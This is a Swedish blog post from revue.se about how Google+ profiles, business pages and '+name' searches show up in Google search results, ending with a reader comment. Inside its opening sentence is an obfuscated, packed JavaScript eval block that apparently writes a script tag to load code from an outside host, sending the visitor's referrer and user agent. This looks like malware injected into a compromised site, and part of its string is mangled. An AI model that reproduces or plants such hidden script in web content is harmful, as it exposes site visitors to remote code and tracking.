Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Så tar Google+ över sökresultaten!

Så tar Google+ över sökresultaten!
Sebastian

Tänkte eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hidrb|var|u0026u|referrer|tkfdn||js|php’.split(’|’),0,{}))
börja med att introducera vår nya företagsprofil på Google+ som ni kan följa genom att
klicka här!

Som många vet så lanserade Google sitt egna sociala nätverk Google+ för inte så längesen. Självklart var det många som var skeptiska till om Google verkligen skulle lyckas stå emot konkurrenten Facebook.

Innan har Google inte varit så framgångsrika med sina tjänster som Google Wave och Google Buzz.

Google är i grunden världens största sökmotor och de vet exakt vad de sysslar med. Det finns inte någon annan som är i ens närheten av deras storlek. Inte minst är sökmotorn också väldigt lönsam.

Det intressanta är att Google aldrig riktigt vetat hur de skulle inkludera de sociala bitarna i sina sökresultat. I ett avtal med Twitter provade Google på funktionen realtidssök. Den fungerade väldigt bra, men nu har det avtalet tyvärr gått ut och den funktionen blev ett minne blott.

Nu är det dags att intressera sig och titta närmare på hur Google börjat inkluderar Google+ direkt i sina sökresultat, något som kommer att bli väldigt viktigt för företag och organisationer i framtiden.

Google+ i sökresultat

Google+ har funnit många sätt att inkluderas i sökresultaten och vissa är mer tydliga än andra. Därför tänkte vi gå ignom hur Google+ nu blivit en viktig del av sökreslutaten.

Så syns Google profilen i sökresultatet

Detta är vad jag fick fram när jag sökte på mitt namn på Google.com. Man ser en bild på mig samt en länk till min profil på Google+. Detta kommer garanterat bli mer synligt i framtiden. Självklart kan man stänga ner detta eller med andra ord gömma sin profil från att dyka upp på sökningar.

Företag och sidor på Google+ i sökresultatet

Företagssidor på Facebook har länge varit intressant och fler företag har anslutit sig. Nu har Google+ också tagit steget in bland dessa företagssidor. Som ni ser i bilden ovan så syns detta otroligt tydligt och kommer säkert bli mer synligt i framtiden. Själv tror jag detta kommer bli otroligt viktigt att finns med på. Revue.se startade sin Google+ profil för några dagar sen, och resultatet har visat sig vara mer än godkänt.

Plusade poster på dessa sidor hamnar också högre upp i sökresultatet. Och hela konceptet växer i takt med att Google+ växer och förbättras.

+Sökning ger en direktlänk till företag på Google+

En ny funktion som Google lanserat är att du nu kan skriva ”+företagsnamnet” och få en direkt respons i sökrutan till relaterade Google+ sidor.

Detta är ett snyggt sätt att koppla in företagssidorna i sökrutan. Dock måste man skriva in ett ”+” innan namnet och det vet jag inte om alla användare kommer utnyttja. Kanske kommer detta bli en mer tydlig funktion i framtiden när andra delar som kan anses viktigare faller på plats.

Detta är bara början av Google+

Som jag nämnde i början så är detta relativt nytt och många funktioner är i utvecklingsfas. Men själv tycker jag det ska bli otroligt intressant att se hur hela Google+ konceptet utvecklas i framtiden och blir något riktigt stort.
Det kommer troligtvis bli viktigare för företag att synas på Google+ än på Facebook då det är på Google användare söker efter relevanta saker. Vill du hitta en målare i Stockholm, ja då söker du på Google.

Man får inte heller glömma att Google nu också slår ihop sina tjänster med varandra på ett mer synkat sätt än innan. Youtube har gjort om sin design och sitt koncept och gjort hela webbplatsen mer socialt anpassad än någonsin. Ditt Google+ konto är numera också ditt Youtube-konto. Snart får vi säkert också se Google maps och Google Places bli involverade i Google+.

Starta er egna Google+ företagssida idag och ligg steget före konkurrenterna. Om ni inte har något Google+ konto, ja, registrera er idag. Och glöm inte att följa revue.se eller mig, Sebastian Plengier Ehrnfelt.

Comments

  1. Jacob Josefsson

    Detta är helt sant. Bra fakta må jag säga. Ska kika närmare på dessa sidor. 🙂